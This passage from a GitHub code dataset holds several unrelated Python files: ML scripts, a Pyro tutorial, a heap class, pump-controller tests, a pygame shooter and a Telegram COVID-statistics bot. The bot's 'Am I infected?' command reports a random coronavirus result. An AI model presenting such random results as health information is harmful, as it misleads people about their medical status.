\n]","repo_name":"abhijith-dev/AppleCart","sub_path":"AppleCart/client/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35156366197","text":"\"\"\"\n@author: enrico\n\n\"\"\"\nfrom model import Model\nimport numpy as np\nimport shutil\n\nmodel = Model(model_path='tf_models', ui_model=False)\n\nshutil.rmtree('confusion_matrices', ignore_errors=True)\n\nEPOCHS = 15\nN_SPLITS = 5\n\n# evaluate multilabel model\nmultilabel_results = model.evaluate_model(\n model.features, model.df_multilabel_labels, 'multilabel', epochs=EPOCHS, n_splits=N_SPLITS)\n# summarize performance\nprint('Multilabel model accuracy: %.3f (%.3f)' %\n (np.mean(multilabel_results), np.std(multilabel_results)))\n\n# evaluate multiclass model\nfor i in range(len(model.categories)):\n multiclass_results = model.evaluate_model(\n features=model.features, labels=model.df_multiclass_labels[:, i],\n task='multiclass', epochs=EPOCHS, n_splits=N_SPLITS, cat=i)\n # summarize performance\n print('Multiclass model accuracy - ' + str(model.categories[i]) + ': %.3f (%.3f)' %\n (np.mean(multiclass_results), np.std(multiclass_results)))\n","repo_name":"andrienr/Hotel-Reviews-Classification","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24417778777","text":"import numpy as np\nfrom sklearn.svm import LinearSVR as SVR\nfrom gen import get_eigenvalues\nfrom sklearn.externals import joblib\nimport time, sys\n\n# load the pre trained linear SVR\n# print('load model')\nsvr = joblib.load('1494690169.1373851model.pkl') \n\n# npzfile = np.load('large_data.npz')\n# X = npzfile['X']\n# y = npzfile['y']\n\n# # we already normalize these values in gen.py\n# # X /= X.max(axis=0, keepdims=True)\n\n# svr = SVR(C=10)\n# svr.fit(X, y)\n\ntest_file = sys.argv[1]\nans_file = sys.argv[2]\n\ntestdata = np.load(test_file)\ntest_X = []\nfor i in range(200):\n data = testdata[str(i)]\n vs = get_eigenvalues(data)\n test_X.append(vs)\n\ntest_X = np.array(test_X)\npred_y = svr.predict(test_X)\n\n# print('write predict')\nwith open(ans_file, 'w') as f:\n print('SetId,LogDim', file=f)\n for i, d in enumerate(pred_y):\n x = d\n if(np.abs((np.round(d) - d)) <= 0.2):\n x = np.round(d)\n x = np.log(x) \n print(f'{i},{x}', file=f)","repo_name":"alvinbhou/ML2017","sub_path":"hw4/dim.py","file_name":"dim.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4253439583","text":"import telebot\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nfrom random import randint\r\n\r\n\r\ntoken = ''\r\nbot = telebot.TeleBot(token)\r\nurl_rf = 'https://index.minfin.com.ua/reference/coronavirus/geography/russia/'\r\n\r\n\r\n@bot.message_handler(commands=['start'])\r\ndef first_message(message):\r\n \"\"\"Greeting and keyboard output.\"\"\"\r\n keyboard = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n keyboard.row('Статистика по миру', 'Статистика по России')\r\n keyboard.row('Заражён ли я?')\r\n bot.send_message(message.chat.id, 'Привет, что хочешь узнать?',\r\n reply_markup=keyboard)\r\n\r\n\r\n@bot.message_handler(regexp='Статистика по России')\r\ndef stats_rf(message):\r\n \"\"\" It displays statistics on coronavirus from the website of\r\n the Ministry of Finance, but for Russia.\r\n \"\"\"\r\n requ_rf = requests.get(url_rf)\r\n soup = BeautifulSoup(requ_rf.content, 'html.parser')\r\n stats_all = soup.find('strong', class_='black').text\r\n stats_dead = soup.find('strong', class_='red').text\r\n stats_healthy = soup.find('strong', class_='green').text\r\n bot.send_message(message.chat.id, '🇷🇺😷Всего заболевших - ' + stats_all)\r\n bot.send_message(message.chat.id, '🇷🇺💀Смертельные случаи - ' + stats_dead)\r\n bot.send_message(message.chat.id, '🇷🇺✨Выздоро­вевшие - ' + stats_healthy)\r\n\r\n\r\n@bot.message_handler(regexp='Статистика по миру')\r\ndef stats_global(message):\r\n \"\"\" Displays statistics on coronavirus from the website of\r\n the Ministry of Finance.\r\n \"\"\"\r\n requ_gl = requests.get('https://index.minfin.com.ua/reference/coronavirus')\r\n soup = BeautifulSoup(requ_gl.content, 'html.parser')\r\n stats_all = soup.find('strong', class_='black').text\r\n stats_dead = soup.find('strong', class_='red').text\r\n stats_healthy = soup.find('strong', class_='green').text\r\n bot.send_message(message.chat.id, '😷Всего заболевших - ' + stats_all)\r\n bot.send_message(message.chat.id, '💀Смертельные случаи - ' + stats_dead)\r\n bot.send_message(message.chat.id, '✨Выздоро­вевшие - ' + stats_healthy)\r\n\r\n\r\n@bot.message_handler(regexp='Заражён ли я?')\r\ndef corona_test(message):\r\n \"\"\"With a 50 to 50 chance, it shows your result on coronavirus.\"\"\"\r\n markup = telebot.types.InlineKeyboardMarkup()\r\n markup.add(telebot.types.InlineKeyboardButton(text='Проверить ещё раз',\r\n callback_data='yes'))\r\n rand = randint(0, 11)\r\n if rand >= 5:\r\n bot.send_photo(message.chat.id, 'https://clck.ru/MkPER',\r\n reply_markup=markup)\r\n else:\r\n bot.send_message(message.chat.id, 'Сейчас - нет🦠',\r\n reply_markup=markup)\r\n\r\n\r\n@bot.callback_query_handler(func=lambda call: True)\r\ndef query_handler(call):\r\n \"\"\"Re-conducting a coronavirus test.\"\"\"\r\n if call.data == 'yes':\r\n bot.delete_message(call.message.chat.id, call.message.message_id)\r\n # Removes previous coronavirus result.\r\n markup = telebot.types.InlineKeyboardMarkup()\r\n markup.add(telebot.types.InlineKeyboardButton(text='Проверить ещё раз',\r\n callback_data='yes'))\r\n rand = randint(0, 11)\r\n if rand >= 5:\r\n bot.send_photo(call.message.chat.id, 'https://clck.ru/MkPER',\r\n reply_markup=markup)\r\n else:\r\n bot.send_message(call.message.chat.id, 'Сейчас - нет🦠',\r\n reply_markup=markup)\r\n\r\n\r\n@bot.message_handler(commands=['info'])\r\ndef what(message):\r\n \"\"\"Information about the bot.\"\"\"\r\n bot.send_message(message.chat.id, '🤑My bitcoin wallet🤑\\\r\n 1FLApcQPyJVmf3uevcN2JiXWpWD86xEVod')\r\n\r\n\r\n@bot.message_handler(content_types=['text'])\r\ndef wrong_command(message):\r\n \"\"\"Unknown message.\"\"\"\r\n bot.send_message(message.chat.id, '???????????????????')\r\n\r\n\r\nif __name__ == '__main__':\r\n bot.infinity_polling()\r\n","repo_name":"sekaskateboards/covid_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4281,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1539057485","text":"def numtopattern(index,k):\n\tif k == 1:\n\t\tprint (numbsym(index))\n\t\treturn numbsym(index)\n\tprefixindex = index//4\n\tprint(prefixindex)\n\tr = index%4\n\tprint(r)\n\tsymbol = numbsym(r)\n\t#print(symbol)\n\tprefixpattern = numtopattern(prefixindex, k-1)\n\tprint(prefixpattern+symbol)\n\treturn prefixpattern + symbol\n\ndef numbsym(index):\n\tnum = {0:\"A\", 1:\"C\", 2:\"G\", 3:\"T\"}\n\t#print(num[index])\n\treturn num[index]\n\nimport sys # you must import \"sys\" to read from STDIN\nindex, k = sys.stdin.read().splitlines()\nprint(index)\nprint(k)\nwith open(\"result.txt\", 'a') as out:\n\tout.write(str(numtopattern(int(index),int(k))))","repo_name":"tyang1/Bioinformatics_Algorithm","sub_path":"numtop.py","file_name":"numtop.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28234924234","text":"# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py:light\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.5.0\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# # SVI Part I\n#\n# http://pyro.ai/examples/svi_part_i.html\n\n# ## Setup\n\n# The different pieces of model() are encoded via the mapping:\n#\n# * observations: `pyro.sample` with the `obs` argument\n# * latent random variables: `pyro.sample`\n# * parameters: `pyro.param`\n#\n# Note that the `obs` is used for conditioning, either you call `pyro.condition()` with on the model and use the `data` parameter to pass a dictionary of `{'sample name': observation}`, or you can call `obs=value` directly inside `pyro.sample`. \n#\n# As a gotcha: In Pyro they use \"latent variables\" ($\\mathbf{z}$) to mean unobservable `pyro.sample` calls, not the latent variables from BNN+LV.\n\n# ## Model learning\n\n# Note that the last equation shown is just Bayes theorem.\n\n# ## Guide\n\n# Want to know the posterior distribution $p(\\mathbf{z}|\\mathbf{x})$ but it's intractable.\n# Instead approximate it with the **guide** $q_{\\phi}(\\mathbf{z})$, where $\\phi$ are the variational parameters.\n#\n# The guide does not contain observations as it must be a properly normalised distribution.\n#\n# For every latent variable (`pyro.sample` statement without an observation) in the `model()`, there must be a matching `pyro.sample` in the `guide()` with the same name (e.g. `pyro.sample('z_1')`).\n# The actual distributions called in each can be different, just the names must match.\n\n# ## Evidence Lower Bound (ELBO)\n\n# Need to revisit this and check how ELBO gets to KL divergence.\n\n# ## `SVI` class\n\n# `SVI` does variational inference in Pyro.\n# Currently only supports ELBO loss, in future more will be added.\n#\n# The user needs to provide three things: the model, the guide, and an optimizer.\n# As an example:\n# ```python\n# import pyro\n# from pyro.infer import SVI, Trace_ELBO\n# svi = SVI(model, guide, optimizer, loss=Trace_ELBO())\n# ```\n\n# ## Optimizers\n\n# Pyro provides its own optimizers you have to use.\n# These are just wrappers around PyTorch optimizers.\n# The difference is that Pyro will generate a new optimizer for every parameter in the model (every `pyro.param`).\n# This is because the `model()` and the `guide()` parameters can be created dynamically during learning (since they are named within the functions, the names can be dynamic so long as they match between the model and the guide).\n#\n# For most cases we don't care much and just call something like:\n# ```python\n# from pyro.optim import Adam\n#\n# adam_params = {\"lr\": 0.005, \"betas\": (0.95, 0.999)}\n# optimizer = Adam(adam_params)\n# ```\n# which will apply the Adam optimizer with identical settings to all parameters.\n#\n# Othersie you can pass a callable to the optimizer with the arguments `module_name` and `param_name`, e.g.:\n# ```python\n# from pyro.optim import Adam\n#\n# def per_param_callable(module_name, param_name):\n# if param_name == 'my_special_parameter':\n# return {\"lr\": 0.010}\n# else:\n# return {\"lr\": 0.001}\n#\n# optimizer = Adam(per_param_callable)\n# ```\n\n# ## A simple example\n\nimport math\nimport os\nimport torch\nimport torch.distributions.constraints as constraints\nimport pyro\nfrom pyro.optim import Adam\nfrom pyro.infer import SVI, Trace_ELBO\nimport pyro.distributions as dist\n\n# this is for running the notebook in our testing framework\nsmoke_test = ('CI' in os.environ)\nn_steps = 2 if smoke_test else 2000\n\n# enable validation (e.g. validate parameters of distributions)\n# We have a newer version\n# assert pyro.__version__.startswith('1.3.0')\npyro.enable_validation(True)\n\n# clear the param store in case we're in a REPL\npyro.clear_param_store()\n\n# create some data with 6 observed heads and 4 observed tails\ndata = []\nfor _ in range(6):\n data.append(torch.tensor(1.0))\nfor _ in range(4):\n data.append(torch.tensor(0.0))\n\n\ndef model(data):\n # define the hyperparameters that control the beta prior\n alpha0 = torch.tensor(10.0)\n beta0 = torch.tensor(10.0)\n # sample f from the beta prior\n f = pyro.sample(\"latent_fairness\", dist.Beta(alpha0, beta0))\n # loop over the observed data\n for i in range(len(data)):\n # observe datapoint i using the bernoulli likelihood\n pyro.sample(\"obs_{}\".format(i), dist.Bernoulli(f), obs=data[i])\n\n\ndef guide(data):\n # register the two variational parameters with Pyro\n # - both parameters will have initial value 15.0.\n # - because we invoke constraints.positive, the optimizer\n # will take gradients on the unconstrained parameters\n # (which are related to the constrained parameters by a log)\n alpha_q = pyro.param(\"alpha_q\", torch.tensor(15.0),\n constraint=constraints.positive)\n beta_q = pyro.param(\"beta_q\", torch.tensor(15.0),\n constraint=constraints.positive)\n # sample latent_fairness from the distribution Beta(alpha_q, beta_q)\n pyro.sample(\"latent_fairness\", dist.Beta(alpha_q, beta_q))\n\n\n# setup the optimizer\nadam_params = {\"lr\": 0.001, \"betas\": (0.90, 0.999)}\noptimizer = Adam(adam_params)\n\n# setup the inference algorithm\nsvi = SVI(model, guide, optimizer, loss=Trace_ELBO())\n\n# do gradient steps\nfor step in range(n_steps):\n svi.step(data)\n if step % 100 == 0:\n print('.', end='')\n\n# grab the learned variational parameters\nalpha_q = pyro.param(\"alpha_q\").item()\nbeta_q = pyro.param(\"beta_q\").item()\n\nalpha_q, beta_q\n\n# here we use some facts about the beta distribution\n# compute the inferred mean of the coin's fairness\ninferred_mean = alpha_q / (alpha_q + beta_q)\n# compute inferred standard deviation\nfactor = beta_q / (alpha_q * (1.0 + alpha_q + beta_q))\ninferred_std = inferred_mean * math.sqrt(factor)\n\nprint(\"\\nbased on the data and our prior belief, the fairness \" +\n \"of the coin is %.3f +- %.3f\" % (inferred_mean, inferred_std))\n","repo_name":"kahn-jms/bayesian-network","sub_path":"pyro_tutorial_svi_part_i.py","file_name":"pyro_tutorial_svi_part_i.py","file_ext":"py","file_size_in_byte":5992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12753288199","text":"__author__ = 'HaoBin'\n\nclass Node():\n def __init__(self, data, left=None, right=None):\n self.node = data\n self.left = None\n self.right = None\n\nclass NodeHeap():\n def __init__(self,root):\n self.root = Node(root)\n\n#####################################\n\nclass Heap():\n def __init__(self):\n self.array = []\n self.count = 0\n\n def __len__(self):\n return self.count\n\n def empty(self):\n return self.count == 0\n\n def peek(self):\n if self.empty() is False:\n return self.array[0]\n else:\n return None\n\n def pop(self):\n if self.empty() is False:\n item = self.array[0]\n self.array[0] = self.array[self.count-1]\n self.downHeap(0)\n self.count -= 1\n return item\n else:\n return None\n\n def insert(self, key):\n self.array.append(key)\n self.count += 1\n k = self.count-1\n self.upHeap(k)\n\n def parent(self,i):\n if i == 0:\n return 0\n elif i % 2 == 0:\n return (i-2) // 2\n elif i % 2 == 1:\n return (i-1) // 2\n\n\n def upHeap(self,i):\n parent = self.parent(i)\n while self.array[parent] < self.array[i] and i > 0:\n self.array[i], self.array[parent] = self.array[parent], self.array[i]\n i = parent\n parent = self.parent(i)\n\n def downHeap(self,i):\n child= (2*i) + 1\n n = len(self)-1\n while child <= n:\n if child < n:\n if self.array[child] < self.array[child+1]:\n child += 1\n if self.array[i] < self.array[child]:\n self.array[i], self.array[child] = self.array[child], self.array[i]\n i = child\n child = (2*i) + 1\n else:\n break\n\n\n\n\nif __name__ == \"__main__\":\n x = Heap()\n x.insert(0)\n x.insert(1)\n print(x.array)\n\n x.insert(2)\n x.insert(3)\n x.insert(4)\n x.insert(5)\n x.insert(6)\n x.insert(7)\n # print(x.array)\n print(x.pop())\n #\n print(len(x))\n #x.insert(8)\n print(x.array)","repo_name":"hbinl/hbinl-scripts","sub_path":"Python/P5 - Sorting and Edit Distance/Q5.py","file_name":"Q5.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23592780318","text":"\"\"\"\nUnit tests for the water-regulation module\n\"\"\"\n\nimport sys\nimport unittest\nfrom unittest.mock import MagicMock\nfrom pump import Pump\nfrom sensor import Sensor\nfrom .controller import Controller\nfrom .decider import Decider\nsys.path.append('../pump')\nsys.path.append('../sensor')\n\n\nclass DeciderTests(unittest.TestCase):\n \"\"\"\n Unit tests for the Decider class\n \"\"\"\n\n def test_off_too_high(self):\n \"\"\"\n scenario: PUMP_OFF, above target water level margin\n :return: PUMP_OUT\n \"\"\"\n decider = Decider(100, 0.05)\n pump = Pump('127.0.0.1', 8000)\n pump.set_state = MagicMock(return_value=True)\n actions = {\n 'PUMP_IN': pump.PUMP_IN,\n 'PUMP_OUT': pump.PUMP_OUT,\n 'PUMP_OFF': pump.PUMP_OFF,\n }\n result = decider.decide(110, \"PUMP_OFF\", actions)\n self.assertEqual(actions[\"PUMP_OUT\"], result)\n\n def test_off_too_low(self):\n \"\"\"\n scenario: PUMP_OFF, below target water level margin\n :return: PUMP_IN\n \"\"\"\n decider = Decider(100, 0.05)\n pump = Pump('127.0.0.1', 8000)\n pump.set_state = MagicMock(return_value=True)\n actions = {\n 'PUMP_IN': pump.PUMP_IN,\n 'PUMP_OUT': pump.PUMP_OUT,\n 'PUMP_OFF': pump.PUMP_OFF,\n }\n result = decider.decide(90, \"PUMP_OFF\", actions)\n self.assertEqual(actions[\"PUMP_IN\"], result)\n\n def test_off_just_right(self):\n \"\"\"\n scenario: PUMP_OFF, at target water level\n :return: PUMP_OFF\n \"\"\"\n decider = Decider(100, 0.05)\n pump = Pump('127.0.0.1', 8000)\n pump.set_state = MagicMock(return_value=True)\n actions = {\n 'PUMP_IN': pump.PUMP_IN,\n 'PUMP_OUT': pump.PUMP_OUT,\n 'PUMP_OFF': pump.PUMP_OFF,\n }\n result = decider.decide(100, \"PUMP_OFF\", actions)\n self.assertEqual(actions[\"PUMP_OFF\"], result)\n\n def test_in_too_high(self):\n \"\"\"\n scenario: PUMP_IN, above target water level\n :return: PUMP_OFF\n \"\"\"\n decider = Decider(100, 0.05)\n pump = Pump('127.0.0.1', 8000)\n pump.set_state = MagicMock(return_value=True)\n actions = {\n 'PUMP_IN': pump.PUMP_IN,\n 'PUMP_OUT': pump.PUMP_OUT,\n 'PUMP_OFF': pump.PUMP_OFF,\n }\n result = decider.decide(101, \"PUMP_IN\", actions)\n self.assertEqual(actions[\"PUMP_OFF\"], result)\n\n def test_in_not_enough(self):\n \"\"\"\n scenario: PUMP_IN, below target water level\n :return: PUMP_IN\n \"\"\"\n decider = Decider(100, 0.05)\n pump = Pump('127.0.0.1', 8000)\n pump.set_state = MagicMock(return_value=True)\n actions = {\n 'PUMP_IN': pump.PUMP_IN,\n 'PUMP_OUT': pump.PUMP_OUT,\n 'PUMP_OFF': pump.PUMP_OFF,\n }\n result = decider.decide(96, \"PUMP_IN\", actions)\n self.assertEqual(actions[\"PUMP_IN\"], result)\n\n def test_out_too_much(self):\n \"\"\"\n scenario: PUMP_OUT, above target water level\n :return: PUMP_OUT\n \"\"\"\n decider = Decider(100, 0.05)\n pump = Pump('127.0.0.1', 8000)\n pump.set_state = MagicMock(return_value=True)\n actions = {\n 'PUMP_IN': pump.PUMP_IN,\n 'PUMP_OUT': pump.PUMP_OUT,\n 'PUMP_OFF': pump.PUMP_OFF,\n }\n result = decider.decide(101, \"PUMP_OUT\", actions)\n self.assertEqual(actions[\"PUMP_OUT\"], result)\n\n def test_out_not_enough(self):\n \"\"\"\n scenario: PUMP_OUT, below target water level.\n :return: PUMP_OFF\n \"\"\"\n decider = Decider(100, 0.05)\n pump = Pump('127.0.0.1', 8000)\n pump.set_state = MagicMock(return_value=True)\n actions = {\n 'PUMP_IN': pump.PUMP_IN,\n 'PUMP_OUT': pump.PUMP_OUT,\n 'PUMP_OFF': pump.PUMP_OFF,\n }\n result = decider.decide(99, \"PUMP_OUT\", actions)\n self.assertEqual(actions[\"PUMP_OFF\"], result)\n\n\nclass ControllerTests(unittest.TestCase):\n \"\"\"\n Unit tests for the Controller class\n \"\"\"\n\n def test_controller(self):\n \"\"\"\n Tests controller without invoking decider directly.\n \"\"\"\n pump = Pump('127.0.0.1', \"8001\")\n pump.get_state = MagicMock(return_value=1)\n pump.set_state = MagicMock(return_value=True)\n sensor = Sensor('127.0.0.1', \"8081\")\n sensor.measure = MagicMock(return_value=120)\n decider = Decider(100, 0.05)\n decider.decide = MagicMock(return_value=1)\n controller = Controller(sensor, pump, decider)\n controller_called = controller.tick()\n sensor.measure.assert_called()\n pump.get_state.assert_called()\n decider.decide.assert_called_with(120, 1, {\n 'PUMP_IN': pump.PUMP_IN,\n 'PUMP_OUT': pump.PUMP_OUT,\n 'PUMP_OFF': pump.PUMP_OFF,\n })\n self.assertEqual(controller_called, True)\n","repo_name":"UWPCE-PythonCert-ClassRepos/Sp2018-Online","sub_path":"students/Chay_Casso/Lesson06/water-regulation-master/waterregulation/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29929325554","text":"prefCliente =int(input('Ola'\n '\\nSelecione o tipo de combustivel que voce deseja!'\n '\\nDigite o numero do combustivel.'\n '\\n(1)Gasolina Aditivada'\n '\\n(2)Gasolina Comum'\n '\\n(3)Diesel'\n '\\n(4)Etanol'\n '\\n'))\n\ndinheiroCliente =int(input ('Digite quanto de combustivel deseja colocar:'))\n\nif prefCliente == 1 :\n combus1 = dinheiroCliente/6.90\n print (f'Total de combustivel:{combus1:.2f}L')\nelif prefCliente == 2 :\n combus2 = dinheiroCliente/7.27\n print(f'Total de combustivel:{combus2:.2f}L')\nelif prefCliente == 3 :\n combus3 = dinheiroCliente/6.88\n print(f'Total de combustivel: {combus3:.2f}L')\nelif prefCliente == 4 :\n combus4 = dinheiroCliente/4.99\n print(f'Total de combustivel:{combus4:.2f}L')\n\n\n ","repo_name":"darahgarcia/projetos-treino","sub_path":"cliente.posto.py","file_name":"cliente.posto.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28513984681","text":"import sys\nfrom time import sleep\nimport pygame\nfrom bullet import Bullet\nfrom alien import Alien\n\n\ndef check_keydown_events(event, ai_settings, screen, ship, bullets):\n '''respond to keydown'''\n if event.key == pygame.K_RIGHT:\n ship.moving_right = True\n if event.key == pygame.K_LEFT:\n ship.moving_left = True\n if event.key == pygame.K_UP:\n ship.moving_up = True\n if event.key == pygame.K_DOWN:\n ship.moving_down = True\n elif event.key == pygame.K_SPACE:\n # create a bullet and add it into bullets Group\n fire_bullet(ai_settings, screen, ship, bullets)\n elif event.key == pygame.K_q:\n sys.exit()\n\n\ndef fire_bullet(ai_settings, screen, ship, bullets):\n '''if haven not reached to the limit, fire a bullet'''\n if len(bullets) < ai_settings.bullets_allowed: # bullet num limit\n new_bullet = Bullet(ai_settings, screen, ship)\n bullets.add(new_bullet)\n\n\ndef check_keyup_events(event, ship):\n '''respond to keyup'''\n if event.key == pygame.K_RIGHT:\n ship.moving_right = False\n if event.key == pygame.K_LEFT:\n ship.moving_left = False\n if event.key == pygame.K_UP:\n ship.moving_up = False\n if event.key == pygame.K_DOWN:\n ship.moving_down = False\n\n\ndef check_events(ai_settings, screen, stats, sb, play_button, ship, aliens, bullets):\n \"\"\"check mouse and keyboard events\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(event, ai_settings, screen, ship, bullets)\n elif event.type == pygame.KEYUP:\n check_keyup_events(event, ship)\n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_x, mouse_y = pygame.mouse.get_pos()\n check_play_button(ai_settings, screen, stats, sb, play_button, ship,\n aliens, bullets, mouse_x, mouse_y)\n\n\ndef check_play_button(ai_settings, screen, stats, sb, play_button, ship, aliens,\n bullets, mouse_x, mouse_y):\n '''start game when Play button is clicked'''\n button_clicked = play_button.rect.collidepoint(mouse_x, mouse_y)\n if button_clicked and not stats.game_active:\n # reset game settings\n ai_settings.initialize_dynamic_settings()\n\n # reset game stats info\n pygame.mouse.set_visible(False)\n stats.reset_stats()\n stats.game_active = True\n\n # reset scoreboard image\n sb.prep_score()\n sb.prep_high_score()\n sb.prep_level()\n sb.prep_ships()\n\n # empty aliens and bullets\n aliens.empty()\n bullets.empty()\n\n # create a new group of aliens and center the ship\n create_fleet(ai_settings, screen, ship, aliens)\n ship.center_ship()\n\n\ndef update_screen(ai_settings, screen, stats, sb, ship, aliens, bullets, play_button):\n '''update images on display and switch to new screen'''\n # redraw in every loop\n screen.fill(ai_settings.bg_color)\n # draw bullets after ship and aliens\n for bullet in bullets.sprites():\n bullet.draw_bullet()\n ship.blitme()\n aliens.draw(screen)\n # show score\n sb.show_score()\n\n # if the game is inactive, draw Play button\n if not stats.game_active:\n play_button.draw_button()\n\n # only the newest screen can be visible\n pygame.display.flip()\n\n\ndef update_bullets(ai_settings, screen, stats, sb, ship, aliens, bullets):\n '''update bullet position, and remove disapeared bullets'''\n # update bullet position\n bullets.update()\n\n # remove disapared bullet and print sprite number\n for bullet in bullets.copy():\n if bullet.rect.bottom <= 0:\n bullets.remove(bullet)\n\n # print(bullets) # for testing bullet delete function\n\n check_bullet_alien_collisions(\n ai_settings, screen, stats, sb, ship, aliens, bullets)\n\n\ndef check_bullet_alien_collisions(ai_settings, screen, stats, sb, ship, aliens, bullets):\n '''respond to the collision of an alien and a bullet'''\n\n # remove collided alien and bullet\n collisions = pygame.sprite.groupcollide(bullets, aliens, True, True)\n\n if collisions:\n for aliens in collisions.values():\n stats.score += ai_settings.alien_points * len(aliens)\n sb.prep_score()\n check_high_score(stats, sb)\n\n if len(aliens) == 0:\n # remove all bullets and renew a group of aliens\n bullets.empty()\n ai_settings.increase_speed()\n\n # increase level\n stats.level += 1\n sb.prep_level()\n\n create_fleet(ai_settings, screen, ship, aliens)\n\n\ndef get_number_aliens_x(ai_settings, alien_width):\n '''calculate how many alines in a line'''\n available_space_x = ai_settings.screen_width - 2 * alien_width\n number_aliens_x = int(available_space_x / (2 * alien_width))\n return number_aliens_x\n\n\ndef get_number_rows(ai_settings, ship_height, alien_height):\n '''calculate how many lines of aliens'''\n available_space_y = (ai_settings.screen_height -\n (3 * alien_height) - ship_height)\n number_rows = int(available_space_y / (2 * alien_height))\n return number_rows\n\n\ndef create_alien(ai_settings, screen, aliens, alien_number, row_number):\n '''create an alien and position it in the current line'''\n alien = Alien(ai_settings, screen)\n alien_width = alien.rect.width\n alien.x = alien_width + 2 * alien_width * alien_number\n alien.rect.x = alien.x\n alien.rect.y = alien.rect.height + 2 * alien.rect.height * row_number\n aliens.add(alien)\n\n\ndef create_fleet(ai_settings, screen, ship, aliens):\n ''' create an alien fleet'''\n # create an lien and calculate how many in a line\n alien = Alien(ai_settings, screen)\n number_aliens_x = get_number_aliens_x(ai_settings, alien.rect.width)\n number_rows = get_number_rows(\n ai_settings, ship.rect.height, alien.rect.height)\n\n for row_number in range(number_rows):\n # create the first line of aliens\n for alien_number in range(number_aliens_x):\n # create one alien and add it in the line\n create_alien(ai_settings, screen, aliens, alien_number, row_number)\n\n\ndef check_fleet_edges(ai_settings, aliens):\n '''react when one alien touches the edge'''\n for alien in aliens.sprites():\n if alien.check_edges():\n change_fleet_direction(ai_settings, aliens)\n break\n\n\ndef change_fleet_direction(ai_settings, aliens):\n '''move all aliens down and change their direction'''\n for alien in aliens.sprites():\n alien.rect.y += ai_settings.fleet_drop_speed\n ai_settings.fleet_direction *= -1\n\n\ndef update_aliens(ai_settings, screen, stats, sb, ship, aliens, bullets):\n \"\"\"\n check if there are aliens touching the edge\n then update positions for all aliens\n \"\"\"\n check_fleet_edges(ai_settings, aliens)\n aliens.update()\n\n # detect a collision between an alien and a ship\n if pygame.sprite.spritecollideany(ship, aliens):\n ship_hit(ai_settings, stats, screen, sb, ship, aliens, bullets)\n\n # check if an alien touches the bottom edge\n check_aliens_bottom(ai_settings, stats, screen, sb, ship, aliens, bullets)\n\n\ndef check_aliens_bottom(ai_settings, stats, screen, sb, ship, aliens, bullets):\n '''check if an alien touches the bottom'''\n screen_rect = screen.get_rect()\n for alien in aliens.sprites():\n if alien.rect.bottom >= screen_rect.bottom:\n # act like ship collision\n ship_hit(ai_settings, stats, screen, sb, ship, aliens, bullets)\n break\n\n\ndef ship_hit(ai_settings, stats, screen, sb, ship, aliens, bullets):\n '''the ship responds when collides with an alien'''\n\n if stats.ships_left > 0:\n stats.ships_left -= 1\n sb.prep_ships()\n\n # empty the alien list and the bullet list\n aliens.empty()\n bullets.empty()\n\n # create a new group of aliens and re-position the ship\n create_fleet(ai_settings, screen, ship, aliens)\n ship.center_ship()\n\n # palse\n sleep(2)\n\n else:\n stats.game_active = False\n pygame.mouse.set_visible(True)\n\n\ndef check_high_score(stats, sb):\n '''check if new high score'''\n if stats.score > stats.high_score:\n stats.high_score = stats.score\n sb.prep_high_score()\n","repo_name":"zjian107-su/Python-Learn-Collection","sub_path":"hands_on_projects/alien_invasion/game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":8399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22964382866","text":"import random\r\n\r\nhasEvent = {}\r\n\r\ndef convertFormat(x, y):\r\n\tkey = \"{} {}\".format(x, y)\r\n\treturn key\r\n\r\ndef eventsGenerator():\r\n\r\n\tnumber = random.randint(5, 100)\r\n\tevents = []\r\n\r\n\tfor i in range(number):\r\n\t\twhile True:\r\n\t\t\tx = random.randint(-10, 10)\r\n\t\t\ty = random.randint(-10, 10)\r\n\t\t\tkey = convertFormat(x, y)\r\n\r\n\t\t\tif hasEvent.get(key, False):\r\n\t\t\t\tcontinue\r\n\t\t\thasEvent[key] = True\r\n\t\r\n\t\t\ttickets = ticketsGenerator()\r\n\t\t\tevents.append((x, y, tickets, (i + 1)))\r\n\t\t\tbreak\r\n\r\n\treturn events\r\n\r\ndef ticketsGenerator():\r\n\r\n\tnumber = random.randint(0, 100)\r\n\ttickets = []\r\n\r\n\tfor i in range((number + 1)):\r\n\t\tprice = round(random.uniform(1, 100), 2)\r\n\t\ttickets.append((price, number))\r\n\r\n\ttickets = sorted(tickets, key=lambda x: int(x[0]))\r\n\r\n\treturn tickets\r\n\r\ndef distance(c1, c2):\r\n\tx1, y1 = c1\r\n\tx2, y2 = c2\r\n\r\n\treturn 